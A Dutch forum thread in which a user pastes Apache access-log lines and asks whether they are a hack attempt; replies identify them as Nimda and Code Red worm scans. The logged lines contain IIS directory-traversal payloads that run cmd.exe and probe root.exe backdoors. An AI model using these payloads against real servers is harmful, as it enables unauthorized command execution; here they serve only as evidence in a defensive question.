[w2k-apache] Is dit een hack poging?

Pagina: 1
Acties:
  • 86 views sinds 30-01-2008

  • Danfoss
  • Registratie: Mei 2000
  • Laatst online: 00:00

Danfoss

Deze ruimte is te koop..

Topicstarter
Ik heb sinds een paar dagen een apache webservertje draaien op mijn w2k servertje (achter kabel modem).
Nou bekeek ik even de apache logs en kwam ik het volgende tegen:

"GET /scripts/root.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:05:51 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:05:59 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:06 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:14 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:22 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:30 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:37 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:47 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288


is dit een poging geweest om iets te hacken?

Volgens mij heb ik alles wel goed afgeschermd, maar hoe kan ik testen of dat ook echt zo is??

Sys Specs


  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

[search=nimda]
[search=code red]

Waar ben je de afgelopen maanden geweest, Afghanistan? :P

[edit]
eens temeer toont dit aan dat mensen die een win2k bak als webserver willen gebruiken research moeten doen...

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device


  • MediaZoo
  • Registratie: Augustus 2001
  • Laatst online: 20:50
buurman van osame bin laden zeker... die woont ook in een grot zonder computer tv en andere elektrische aparatuur :P

  • Danfoss
  • Registratie: Mei 2000
  • Laatst online: 00:00

Danfoss

Deze ruimte is te koop..

Topicstarter
aah.. vandaar..
dit zijn dus gewoon worm aanvallen..
Als ik het heel goed heb kan mij dus nixs overkomen aangezien ik Apache draai en geen IIS.

En ik HEB research gedaan hoor. Dat is een van de redenen dat ik GEEN IIS gebruik.

Sys Specs


  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Toch niet genoeg, want dan had je die signature wel herkend ;)

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device


  • jep
  • Registratie: November 2000
  • Laatst online: 05-05 11:28

jep

Zoek eens op iis cmd.exe ;)

Kun je lachen :D

  • ACM
  • Registratie: Januari 2000
  • Niet online

ACM

Software Architect

Werkt hier

nimda dus
Pagina: 1

Dit topic is gesloten.